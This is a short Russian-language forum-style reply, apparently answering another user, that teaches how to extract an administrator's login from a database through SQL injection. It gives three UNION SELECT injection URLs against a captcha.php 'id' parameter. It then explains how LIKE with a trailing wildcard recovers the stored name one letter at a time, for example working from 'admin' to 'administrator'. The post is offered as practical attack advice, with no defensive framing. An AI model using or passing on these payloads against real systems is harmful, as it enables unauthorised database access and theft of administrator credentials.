Был такой случай
Ну во первых лимит не функция все таки что ты ее прям со скобками.
limit листает базу по колонкам а тут надо по буквам.

Ну если тебе надо выдрать допусить логин пасс админа из бд.

http://site/captcha.php?id=-1'+union+select+1,user,3,4,5+from+admin/*

тебе выводит admin

ты дальше юзаешь такую фишку как LIKE

http://site/captcha.php?id=-1'+union+select+1,user,3,4,5+from+admin+where+user +like+'admini%'/*
если вывелось admin то значет там еще есть буковка i

http://site/captcha.php?id=-1'+union+select+1,user,3,4,5+from+admin+where+user +like+'administrator%'/*

Если выводиться admin то в базе записанно administrator так же со всеми другими данными.